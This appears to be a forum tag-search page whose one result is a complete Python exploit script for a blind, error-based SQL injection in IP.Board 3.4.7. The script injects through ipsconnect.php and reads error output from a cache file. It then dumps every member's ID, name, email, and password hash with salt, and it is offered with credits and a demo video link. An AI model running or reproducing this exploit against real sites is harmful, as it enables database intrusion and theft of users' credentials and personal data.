Jump to content

Search the Community

Showing results for tags 'ipb sqli 3.4.7'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. #!/usr/bin/env python # Sunday, November 09, 2014 - secthrowaway@safe-mail.net # IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable # Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs print '\n\n---------------------------------------------------------------------------------' print 'Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs' print '---------Script has been modified for different table prefix XXX_members---------' print '---------------------------------------------------------------------------------\n\n\n' url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ') url = url.rstrip('/') ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re import urllib2, urllib def inject(sql): try: urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e: if e.code == 503: data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE) if txt is not None: return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli)) if s < 31: return inject(sqli) else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) return r members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1') n = inject('SELECT COUNT(*) FROM %s' % members_table) print '----------------------------------------------------------------------------' print '* Found %s users' % n print '----------------------------------------------------------------------------' for j in range(int(n)): print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j)) print '{:20s} {:20s}'.format('Name',get('name', members_table, j)) print '{:20s} {:20s}'.format('Email',get('email', members_table, j)) print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j)) print '----------------------------------------------------------------------------' Video: https://vimeo.com/111863081 Credit: Makman
×
×
  • Create New...